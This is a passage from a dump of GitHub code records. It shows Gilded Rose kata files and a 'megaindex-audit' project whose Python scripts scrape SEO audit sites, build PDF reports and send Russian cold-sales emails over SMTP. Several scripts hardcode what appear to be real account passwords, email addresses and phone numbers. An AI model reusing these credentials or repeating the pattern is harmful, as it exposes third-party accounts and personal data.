sulfuras import Sulfuras\nfrom agedBrie import AgedBrie\nfrom backstage import Backstage\n\n\nclass GildedRose():\n\n def __init__(self, stock):\n self.stock = stock\n\n \n def getStock(self):\n return self.stock\n \n\n def updateStock(self):\n for item in self.stock:\n item.updateQuality()\n\n\n\n\nif __name__ == \"__main__\":\n \n\n # TEST CASES #\n\n stock = [Sulfuras('sulfuras', 10, 80), AgedBrie('agedBrie', 3, 4), Backstage('backstage', 5, 25)]\n tienda = GildedRose(stock)\n tienda.updateStock()\n\n assert tienda.getStock()[0].getQuality() == 80\n assert tienda.getStock()[0].getName() == \"sulfuras\"\n assert tienda.getStock()[0].getSellIn() == 10" }, { "alpha_fraction": 0.5052083134651184, "alphanum_fraction": 0.53125, "avg_line_length": 18.233333587646484, "blob_id": "4784c48d50f01c51cc4b6d8e0d2255e3cdf2329e", "content_id": "8272512b16664e3dee7c302f6f8b8fb049064926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 576, "license_type": "no_license", "max_line_length": 36, "num_lines": 30, "path": "/backstage.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "from regularItem import RegularItem\n\nclass Backstage(RegularItem):\n\n def updateQuality(self):\n \n if self.getSellIn() <= 5:\n self.quality += 3\n\n elif self.getSellIn() <= 10:\n self.quality += 2\n\n elif self.getSellIn() > 10:\n self.quality += 1\n \n else:\n self.quality = 0\n\n\nif __name__ == '__main__':\n\n pato = Backstage('pato', 20, 4)\n\n assert pato.getName() == 'pato'\n\n pato.setSellIn()\n assert pato.getSellIn() == 19\n\n pato.updateQuality() \n assert pato.getQuality() == 5" }, { "alpha_fraction": 0.5141955614089966, "alphanum_fraction": 0.5236592888832092, "avg_line_length": 17.705883026123047, "blob_id": "8dfe497624426156ba4be3d391fd6c1e146810fc", "content_id": "72537f8e5ceee711bc860960b4c520a2e908d50e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "no_license", "max_line_length": 83, "num_lines": 17, "path": "/item.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "class Item:\n\n\n def __init__(self, name, sellIn, quality):\n self.name = name\n self.sellIn = sellIn\n self.quality = quality\n\n\n def __repr__(self):\n return '%s, %s, %s' % (self.getName(), self.getSellIn(), self.getquality())\n\n\n\nif __name__ == '__main__':\n\n pato = Item('pato', 20, 4)" } ]
4
jz36/megaindex-audit
https://github.com/jz36/megaindex-audit
124e16f4e5de585458acafeeeb2fd92a28bf2bff
a2d2b2448920da3cc5cff479c697bb907e559975
6e17d415c0c95d1e904bfc82aa96a23c68efcf8f
refs/heads/master
2021-01-01T05:12:19.388463
2017-07-27T06:56:29
2017-07-27T06:56:29
58,571,131
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7298524379730225, "alphanum_fraction": 0.7389330267906189, "avg_line_length": 25.727272033691406, "blob_id": "0d89e73f0a143fed77dd862e9edb325749eaa17e", "content_id": "9cdb56d01b0123a814f5694f749a036a637787f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 890, "license_type": "no_license", "max_line_length": 78, "num_lines": 33, "path": "/smtpproof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from smtplib import SMTP_SSL\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders as Encoders\nimport os\n\nfilepath = \"/home/jz36/Документы/chess/bBishop.png\"\nbasename = os.path.basename(filepath)\naddress = \"[email protected]\"\n\n# Compose attachment\npart = MIMEBase('application', \"octet-stream\")\npart.set_payload(open(filepath,\"rb\").read() )\nEncoders.encode_base64(part)\npart.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % basename)\npart2 = MIMEText('how are you?', 'plain')\n\n# Compose message\nmsg = MIMEMultipart()\nmsg['From'] = address\nmsg['To'] = '[email protected]'\nmsg['Subject'] = 'proof'\n\nmsg.attach(part2)\nmsg.attach(part)\n\n# Send mail\nsmtp = SMTP_SSL()\nsmtp.connect('smtp.yandex.ru')\nsmtp.login(address, 'rjcjq12utybq')\nsmtp.sendmail(address, '[email protected]', msg.as_string())\nsmtp.quit()" }, { "alpha_fraction": 0.6326370239257812, "alphanum_fraction": 0.6448705196380615, "avg_line_length": 36.47452926635742, "blob_id": "a9b88fbfd29685959991600e20fda63d65ddcd2b", "content_id": "29f83c2c208e205ee925bd3e20adf4efa41544c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15960, "license_type": "no_license", "max_line_length": 405, "num_lines": 373, "path": "/tryUI.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter.filedialog import *\nimport fileinput\n#import requests\nimport urllib.parse\nimport time\nfrom smtplib import SMTP_SSL\nfrom email.mime.multipart import MIMEMultipart\nfrom email.headerregistry import Address\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders as Encoders\nimport os\nfrom pdb import set_trace\n#from wkhtmltopdfwrapper import WKHtmlToPdf\nfrom weasyprint import HTML\nfrom selenium import webdriver\n\n\ndef indexSite(site, customerEmail, customerFIO):\n\tmethods = ('reindex_site', 'get_index')\n\n\tBASE_URL = 'http://api.megaindex.ru/?'\n\n\tparamsForReIndex = {\n\t\t'method': methods[0],\n\t\t'output': 'json',\n\t\t'mode': 'site',\n\n\t\t'url': site,\n\t\t'version_id': '1',\n\t\t'target': 'reindex',\n\t\t'count_page': '30'\n\t}\n\n\tfirstResponse = requests.get(BASE_URL, params=paramsForReIndex)\n\tfirstJson = firstResponse.json()\n\tprint(firstJson)\n\n\tparamsForGetIndex = {\n\t\t'method': methods[1],\n\n\t\t'url': site,\n\t\t'version_id': firstJson['version_id']\n\t}\n\n\ttime.sleep(300)\n\n\tsecondResponse = requests.get(BASE_URL, params=paramsForGetIndex)\n\tsecondJson = secondResponse.json()\n\n\tf = open('textJson.txt', 'w')\n\tf.write(str(secondJson))\n\tf.close()\n\n\tsubject = 'Аудит сайта ' + site\n\n\tmessage = \"Добрый день, \" + customerFIO + \". Провели аудит вашего сайта.\"\n\n\t#sendMail(customerEmail, subject, message)\n\ndef sendMail(emailTo, subject, msgText, fileAddr):\n\tfilepath = fileAddr\n\tbasename = os.path.basename(filepath)\n\taddress = \"[email protected]\"\n\n\t# Compose attachment\n\tpart = MIMEBase('application', \"octet-stream\")\n\tpart.set_payload(open(filepath,\"rb\").read() )\n\tEncoders.encode_base64(part)\n\tpart.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % basename)\n\tpart3 = MIMEBase('application', \"octet-stream\")\n\tpart3.set_payload(open(os.getcwd() + '/plan_rabot_po_saitu_na_god.xlsx',\"rb\").read() )\n\tEncoders.encode_base64(part3)\n\tpart3.add_header('Content-Disposition', 'attachment; filename=\"plan_rabot_po_saitu_na_god.xlsx\"')\n\tpart2 = MIMEText(msgText, 'plain')\n\n\t# Compose message\n\tmsg = MIMEMultipart()\n\tmsg['From'] = 'Михаил Юрьевич Бубновский <[email protected]>'\n\tmsg['To'] = emailTo\n\tmsg['Subject'] = subject\n\n\tmsg.attach(part2)\n\tmsg.attach(part)\n\tmsg.attach(part3)\n\n\t# Send mail\n\tsmtp = SMTP_SSL()\n\tsmtp.connect('smtp.yandex.ru')\n\tsmtp.login(address, 'biksileev')\n\tsmtp.sendmail(address, emailTo, msg.as_string())\n\tsmtp.quit()\n\ndef proof(event):\n\tprint('Start work!')\n\tindexSite(siteEntry.get(), emailEntry.get(), nameEntry.get())\n\tprint('Done!')\n\tsiteEntry.delete(0, len(siteEntry.get()))\n\temailEntry.delete(0, len(emailEntry.get()))\n\tnameEntry.delete(0, len(nameEntry.get()))\n\ndef proof2(event):\n\tgrabPRCY(op)\n\ndef grabPRCY(fileAddr):\n\tfrom grab import Grab\n\n\tdef clearStr( string ):\n\t\tif type(string) != type(None):\n\t\t\treturn string.replace('\\n','').replace('\\t','').replace('\\r','')\n\n\tg = Grab()\n\n\tg.go('https://id.pr-cy.ru/signup/login/')\n\t\t\t\n\tg.doc.set_input('login_email','[email protected]') \n\tg.doc.set_input('password','biksileev')\n\tg.doc.submit()\n\toutput = open('Finished.txt', 'w')\n\n\tj = 1\n\n\tphant = webdriver.PhantomJS()\n\n\tfor string in fileinput.input(fileAddr):\n\n\t\tcustomerList = string.split('\t')\n\n\t\tcustomerList[2] = clearStr(customerList[2])\n\n\t\tphant.get('https://a.pr-cy.ru/' + customerList[1])\n\n\t\ttime.sleep(60)\n\n\t\tg.go('https://a.pr-cy.ru/' + customerList[1])\n\n\t\tnewList = g.css_list('.is')\n\n\t\tprint(len(newList))\n\n\t\ti = 0\n\n\t\tf = open('audit/' + customerList[1] + '.html','w')\n\t\tf.write('''<!DOCTYPE html>\n\t<html>\n\t\t<head>\n\t\t\t<meta charset=\"utf-8\" />\n\t\t\t<link rel='stylesheet' href=\"style.css\">\n\t\t</head>\n\t\t<body>\n\t\t\t<div id=\"head\">\n\t\t\t\t<img src=\"biksileev.jpg\"/>\n\t\t\t\t<h1>Технический аудит сайта http://''' + customerList[1] + '''</h1>\n\t\t\t\t<p>Для чёткого понимания текущего технического состояния сайта http://''' + customerList[1] + '''\nбыл проведён полный технический аудит, результаты которого представлены ниже в виде таблицы.</p></div>''')\n\t\tf.write('<div>')\n\t\tf.write('<table>')\n\t\tf.write('<thead><tr><td colspan=\"2\">Технический аудит</td></tr></thead>')\n\t\tf.write('<tbody>')\n\t\tf.write('<tr><td>Критерий</td><td>Текущее состояние</td></tr>')\n\n\t\tfor name in newList:\n\t\t\tif True: #not('Обратные ссылки' in name.cssselect('.info-test')[0].text) or not('Аналитика' in name.cssselect('.info-test')[0].text):\n\t\t\t\tif len(name.cssselect('.info-test')) > 0:\n\t\t\t\t\tprint(name.cssselect('.info-test')[0].text)\n\t\t\t\t\tif (('Описание страницы' or 'Скриншот сайта на смартфоне') in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\tf.write('</table></div><div class=\"pageBreak\"><table>')\n\t\t\t\t\t\tf.write('<tr ><td class=\"left\">')\n\t\t\t\t\telse:\n\t\t\t\t\t\tf.write('<tr><td class=\"left\">')\n\t\t\t\t\tf.write(name.cssselect('.info-test')[0].text)\n\t\t\t\t\tf.write('</td>')\n\t\t\t\t\tf.write(' ')\n\t\t\t\t\tif len(name.cssselect('.content-test')) > 0:\n\t\t\t\t\t\tif (len(clearStr(name.cssselect('.content-test')[0].text)) > 0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tif (len(name.cssselect('.content-test')[0].cssselect('a')) > 0): \n\t\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].text) + clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')) > 0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write('<img src=\"http://' + name.cssselect('.content-test')[0].cssselect('.iphone .iphone-screen img')[0].get('src')[2:] + '\">')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif(('Facebook' in name.cssselect('.info-test')[0].text) or ('ВКонтакте' in name.cssselect('.info-test')[0].text) or ('Google+' in name.cssselect('.info-test')[0].text) or ('Twitter' in name.cssselect('.info-test')[0].text)):\n\t\t\t\t\t\t\tif(name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\t\tf.write('Ссылка на страницу найдена.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\t\telif(name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\t\tf.write('Ссылка на страницу не найдена.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif ((len(name.cssselect('.content-test')[0].cssselect('a')) > 0)):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('a')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('p')) > 0):\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('p')\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tfor paragraph in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(paragraph.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')) > 0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info .progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('.progress-info')) > 0):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(clearStr(name.cssselect('.content-test')[0].cssselect('.progress-info')[0].text))\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif (len(name.cssselect('.content-test')[0].cssselect('span')) > 0) or ('Системы статистики' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tnewList2 = name.cssselect('.content-test')[0].cssselect('span')\n\t\t\t\t\t\t\tfor analytics in newList2:\n\t\t\t\t\t\t\t\tf.write(clearStr(analytics.text))\n\t\t\t\t\t\t\t\tf.write('<br>')\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\telif (len(name.cssselect('.info-test')) > 0):\n\t\t\t\t\t\tif('Местоположение сервера' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif (name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\telif (name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right unsuccess\">')\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf.write('<td class=\"right\">')\n\t\t\t\t\t\t\tf.write(name.cssselect('.content-test img')[0].get('alt').split(' ')[2])\n\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\telif('Favicon' in name.cssselect('.info-test')[0].text):\n\t\t\t\t\t\t\tif(name.cssselect('.check-test')[0].get('test-status') == 'success'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\t\t\t\t\telif(name.cssselect('.check-test')[0].get('test-status') == 'fail'):\n\t\t\t\t\t\t\t\tf.write('<td class=\"right success\">')\n\t\t\t\t\t\t\t\tf.write('Отлично, у сайта есть Favicon.')\n\t\t\t\t\t\t\t\tf.write('</td>')\n\t\t\ti += 1\n\t\t\t'''f.write('<td>')\n\t\t\tnewList3 = name.cssselect('.description p')\n\t\t\tfor paragraph in newList3:\n\t\t\tf.write(paragraph.text)'''\n\t\tf.write('</tbody>')\n\t\tf.write('</table>')\n\t\tf.write('''<p> Резолюция\nСайт частично оптимизирован.</p>\n\t\t</body>\n\t\t</html>\n\t\t\t''')\n\t\tf.close()\n\t\tfile = HTML(filename=\"audit/\" + customerList[1] + \".html\")\n\t\tfile.render().write_pdf(target=\"audit/\" + customerList[1] + \".pdf\")\n\t\t#file.render('file://' + os.getcwd() + '/audit/' + customerList[1] + '.html', 'audit/' + customerList[1] + '.pdf')\n\t\tsubject = customerList[0] + ' - подготовили аудит вашего сайта: ' + customerList[1]\n\t\tmessage = customerList[0] + \"\"\", добрый день!\n\nПричина нашего обращения к Вам не случайна.\n\nСпециалистами студии Дмитрия Биксилеева в течение марта месяца проводился выборочный аудит сайтов компаний работающих в сфере услуг для бизнеса. В том числе был проведен краткий аудит Вашего сайта %s\n\nНашими SEO-специалистами выявлены достаточно серьезные ошибки на сайте, мешающие его продвижению в поисковых системах и снижающие удобство пользования вашим сайтом для ваших потенциальных клиентов (см. приложение «Экспресс аудит сайта»). Как правило, данные ошибки не заметны на первый взгляд, но об их наличии убедительно свидетельствует низкий КПД сайта.\n\nНаверное, и Вы сами, как ответственный и экономный хозяин, периодически задаетесь вопросом:\n\nПочему сайт, в который вложено столько интеллектуальных и финансовых ресурсов не оправдывает свое существование?\nПочему клиенты заходят на сайт, но не совершают покупок?\nПочему Ваши конкуренты уводят клиентов?\n\nМы дадим ответы на все интересующие Вас вопросы и с удовольствием поделимся самыми свежими и самыми необходимыми в XXI веке знаниями по интернет-маркетингу. В случае Вашей заинтересованности, сделаем полный базовый, технический и юзабилити аудит сайта, предложим реальные сроки и способы устранения недостатков и выведем Ваш сайт на лидирующие позиции в поисковиках по самым высоко конверсионным запросам.\n\nМы не предлагаем Вам услуги с непредсказуемым или неубедительным результатом. Мы предлагаем взрывной рост Вашему Интернет-бизнесу!\n\nПомогая Вам в бизнесе, мы становимся своеобразным хуком в интернет-продажах, Вашим директором по маркетингу, полностью выстраивающим маркетинг и систему продаж.\n\nС уважением к Вам и Вашему бизнесу, Бубновский Михаил\nДиректор по развитию компании Студия Дмитрия Биксилеева\n\n----------------------------------------------------------\nТел.: +7(343)298-03-54\nСот. Тел.: +7 (922)1554515\nE-mail: [email protected]\nskype: ottepel_1\nwww.biksileev.ru\"\"\" % customerList[1]\n\t\t#sendMail(customerList[2], subject, message, 'audit/' + customerList[1] + '.pdf')\n\t\tcustomerList.append('Отправлено')\n\t\toutput.write('\t'.join(customerList))\n\t\toutput.write('\\n')\n\t\ttext1.delete('1.0', str(len('\t'.join(customerList) + '\\n') + 1) + '.0') \n\t\ttext1.insert(str(j) + '.0', '\t'.join(customerList) + '\\n')\n\t\ttext1.update()\n\toutput.close()\n\tphant.quit()\n\n\n\ndef openFile( event ):\n\taskopenfilename()\n\nroot = Tk()\n\n#indexSite( 'biksileev.ru', 'asf', 'asdffdf' )\n\ntext1=Text(root,height=3,width=70,font='Arial 12',wrap=WORD)\n\nmainFrame = Frame(root,width=500,height=100,bd=5)\n\nop = askopenfilename()\n\nbuttonStart = Button(mainFrame, text='Start')\n\n'''nameLabel = Label(mainFrame, text=\"Ваше ФИО (полностью)\")\n\nnameEntry = Entry(mainFrame)\n\nnameLabel = Label(mainFrame, text=\"Ваше ФИО (полностью)\")\n\nnameEntry = Entry(mainFrame)\n\nnameLabel = Label(mainFrame, text=\"Ваше ФИО (полностью)\")\n\nnameEntry = Entry(mainFrame)\n'''\nbuttonStart.bind(\"<Button-1>\", proof2)\n\n#op.bind(\"<Button-1>\", openFile)\n\nmainFrame.pack()\n\ntext1.pack()\n\n#op.pack()\n\nbuttonStart.pack()\n\nroot.mainloop()\n" }, { "alpha_fraction": 0.6455398797988892, "alphanum_fraction": 0.6619718074798584, "avg_line_length": 19.629032135009766, "blob_id": "7851fae8553da15e68126c7101883c7171f880b6", "content_id": "2f6a46393bd60cac9aaa1adc1d110a86fbc3e0e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1284, "license_type": "no_license", "max_line_length": 65, "num_lines": 62, "path": "/proof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "import requests\nimport urllib.parse\nimport time\nfrom requests.auth import HTTPDigestAuth\n\n'''methods = ('reindex_site', 'get_index')\n\nsites = ('biksileev.ru', 'marvel-gold.ru', 'atl96.ru')\n\nBASE_URL = 'http://api.megaindex.ru/?'\n\nparamsForReIndex = {\n\t'method': methods[0],\n\t'output': 'json',\n\t'mode': 'site',\n\t'login': '[email protected]',\n\t'password': 'NokiaN9777',\n\t'url': sites[2],\n\t'target': 'reindex',\n\t'version_id': '1',\n\t'count_page': '30'\n}\n\nfirstResponse = requests.get(BASE_URL, params=paramsForReIndex)\nfirstJson = firstResponse.json()\n\nparamsForGetIndex = {\n\t'method': methods[1],\n\t'login': '[email protected]',\n\t'password': 'NokiaN9777',\n\t'url': paramsForReIndex['url'],\n\t'version_id': firstJson['version_id']\n}\n\ntime.sleep(600)\n\nsecondResponse = requests.get(BASE_URL, params=paramsForGetIndex)\nsecondJson = secondResponse.json()\n\nprint(secondJson)'''\n\nsession = requests.Session()\nsession.post('https://id.pr-cy.ru/signup/login/', {\n 'login_email': '[email protected]',\n 'password': 'biksileev',\n 'remember': 1,\n})\n\n\nBASE_URL = 'https://a.pr-cy.ru'\n\nresponse = requests.get('https://id.pr-cy.ru/signup/login/')\n\nprint('Яндекс' in response.text)\n\nf = open('test.html', 'w', encoding='ISO-8859-1')\n\n#msg = str(response.text).encode('cp1251')\n\nf.write(str(response.text))\n\nf.close()" }, { "alpha_fraction": 0.5930232405662537, "alphanum_fraction": 0.6937984228134155, "avg_line_length": 18.846153259277344, "blob_id": "1410d6144892f7709b112680f154a8c4e685fde9", "content_id": "bd0149634b94c3eee182d6b7dea92a2089a76a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/tkproof.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "from tkinter import *\n \nroot = Tk()\n \nfra1 = Frame(root,width=500,height=100,bg=\"darkred\")\nfra2 = Frame(root,width=300,height=200,bg=\"green\",bd=20)\nfra3 = Frame(root,width=500,height=150,bg=\"darkblue\")\n \nfra1.pack()\nfra2.pack()\nfra3.pack()\n \nroot.mainloop() " }, { "alpha_fraction": 0.6156449317932129, "alphanum_fraction": 0.6284003853797913, "avg_line_length": 31.14644432067871, "blob_id": "ddf0ab7431bcb0f56069928342174b82a7d118bc", "content_id": "73babb93c944dc309a48a88eb338082d148bd9e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8072, "license_type": "no_license", "max_line_length": 232, "num_lines": 239, "path": "/tryUI2.py", "repo_name": "jz36/megaindex-audit", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \nfrom Tkinter import *\nfrom tkFileDialog import *\nimport fileinput\nimport urllib2.requests\nimport urllib.parse\nimport time\nfrom smtplib import SMTP_SSL\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders as Encoders\nimport os\nfrom pdb import set_trace\n\ndef indexSite(site, customerEmail, customerFIO):\n\tmethods = ('reindex_site', 'get_index')\n\n\tBASE_URL = 'http://api.megaindex.ru/?'\n\n\tparamsForReIndex = {\n\t\t'method': methods[0],\n\t\t'output': 'json',\n\t\t'mode': 'site',\n\t\t'login': '[email protected]',\n\t\t'password': 'NokiaN9777',\n\t\t'url': site,\n\t\t'target': 'reindex',\n\t\t'version_id': '1',\n\t\t'count_page': '30'\n\t}\n\n\t#pdb.set_trace()\n\n\tfirstResponse = requests.get(BASE_URL, params=paramsForReIndex)\n\tfirstJson = firstResponse.json()\n\n\tparamsForGetIndex = {\n\t\t'method': methods[1],\n\t\t'login': '[email protected]',\n\t\t'password': 'NokiaN9777',\n\t\t'url': site,\n\t\t'version_id': firstJson['version_id']\n\t}\n\n\ttime.sleep(300)\n\n\tsecondResponse = requests.get(BASE_URL, params=paramsForGetIndex)\n\tsecondJson = secondResponse.json()\n\n\tf = open('textJson.txt', 'w')\n\tf.write(str(secondJson))\n\tf.close()\n\n\tsubject = 'Аудит сайта ' + site\n\n\tmessage = \"Добрый день, \" + customerFIO + \". Провели аудит вашего сайта.\"\n\n\tsendMail(customerEmail, subject, message)\n\ndef sendMail(emailTo, subject, msgText, fileAddr):\n\tfilepath = fileAddr\n\tbasename = os.path.basename(filepath)\n\taddress = \"[email protected]\"\n\n\t# Compose attachment\n\tpart = MIMEBase('application', \"octet-stream\")\n\tpart.set_payload(open(filepath,\"rb\").read() )\n\tEncoders.encode_base64(part)\n\tpart.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % basename)\n\tpart2 = MIMEText(msgText, 'plain')\n\n\t# Compose message\n\tmsg = MIMEMultipart()\n\tmsg['From'] = address\n\tmsg['To'] = emailTo\n\tmsg['Subject'] = subject\n\n\tmsg.attach(part2)\n\tmsg.attach(part)\n\n\t# Send mail\n\tsmtp = SMTP_SSL()\n\tsmtp.connect('smtp.yandex.ru')\n\tsmtp.login(address, 'rjcjq12utybq')\n\tsmtp.sendmail(address, emailTo, msg.as_string())\n\tsmtp.quit()\n\ndef proof(event):\n\t#pdb.set_trace()\n\tprint('Start work!')\n\tindexSite(siteEntry.get(), emailEntry.get(), nameEntry.get())\n\tprint('Done!')\n\tsiteEntry.delete(0, len(siteEntry.get()))\n\temailEntry.delete(0, len(emailEntry.get()))\n\tnameEntry.delete(0, len(nameEntry.get()))\n\ndef proof2(event):\n\tgrabPRCY(op)\n\ndef grabPRCY(fileAddr):\n\tfrom grab import Grab\n\n\tdef clearStr( string ):\n\t\treturn string.replace('\\n','').replace('\\t','').replace('\\r','')\n\n\tg = Grab()\n\n\tg.go('https://id.pr-cy.ru/signup/login/')\n\n\tg.doc.set_input('login_email','[email protected]') \n\tg.doc.set_input('password','biksileev')\n\tg.doc.submit()\n\n\tfor string in fileinput.input(fileAddr):\n\n\t\tcustomerList = string.split('\t')\n\n\t\tg.go('https://a.pr-cy.ru/' + customerList[1])\n\n\t\ttime.sleep(10)\n\n\t\tnewList = g.css_list('.is')\n\n\t\ti = 0\n\n\t\tf = open('audit/' + customerList[1] + '.html','w')\n\t\tf.write('''<!DOCTYPE html>\n\t<html>\n\t\t<head>\n\t\t\t<meta charset=\"utf-8\" />\n\t\t\t<link rel='stylesheet' href=\"style.css\">\n\t\t</head>\n\t\t<body>\n\t\t\t<div id=\"head\">\n\t\t\t\t<img src=\"biksileev.jpg\"/>\n\t\t\t\t<h1>Технический аудит сайта http://''' + customerList[1] + '''</h1>\n\t\t\t\t<p>Для чёткого понимания текущего технического состояния сайта http://''' + customerList[1] + '''\nбыл проведён полный технический аудит, результаты которого представлены ниже в виде таблицы.</p></div>''')\n\t\tf.write('<table>')\n\t\tf.write('<thead><tr><td colspan=\"2\">Технический аудит</td></tr></thead>')\n\t\tf.write('<tbody>')\n\t\tf.write('<tr><td>Критерий</td><td>Текущее состояние</td></tr>')\n\n\t\tfor name in newList:\n\t\t\tif True: #not('Обратные ссылки' in name.cssselect('.info-test')[0].text) or not('Аналитика' in name.cssselect('.info-test')[0].text):\n\t\t\t\tf.write('<tr><td class=\"left\">')\n\t\t\t\tif len(name.cssselect('.info-test')) > 